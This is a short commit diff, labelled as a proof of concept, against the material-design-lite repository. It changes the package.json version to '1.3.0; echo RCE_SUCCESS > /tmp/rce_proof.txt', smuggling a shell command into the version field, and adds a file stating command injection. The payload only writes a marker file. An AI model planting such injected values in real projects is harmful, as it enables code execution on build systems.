PoC: Add proof file and trigger RCE via package.json version

donutt2u · donutt2u · commit 025314d63173 · 2025-09-26T15:47:41.000+05:00
diff --git a/package.json b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "material-design-lite",
-  "version": "1.3.0",
+  "version": "1.3.0; echo RCE_SUCCESS > /tmp/rce_proof.txt",
   "description": "Material Design Components in CSS, JS and HTML",
   "private": true,
   "license": "Apache-2.0",
@@ -74,4 +74,4 @@
       "es2015"
     ]
   }
-}
+}
diff --git a/poc_proof.txt b/poc_proof.txt
@@ -0,0 +1 @@
+RCE Proof: Command injection via package.json version

Original file line number	Diff line number	Diff line change
`@@ -1,6 +1,6 @@`
`1`	`1`	`{`
`2`	`2`	`"name": "material-design-lite",`
`3`		`- "version": "1.3.0",`
	`3`	`+ "version": "1.3.0; echo RCE_SUCCESS > /tmp/rce_proof.txt",`
`4`	`4`	`"description": "Material Design Components in CSS, JS and HTML",`
`5`	`5`	`"private": true,`
`6`	`6`	`"license": "Apache-2.0",`
`@@ -74,4 +74,4 @@`
`74`	`74`	`"es2015"`
`75`	`75`	`]`
`76`	`76`	`}`
`77`		`-}`
	`77`	`+}`
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1 @@`
	`1`	`+RCE Proof: Command injection via package.json version`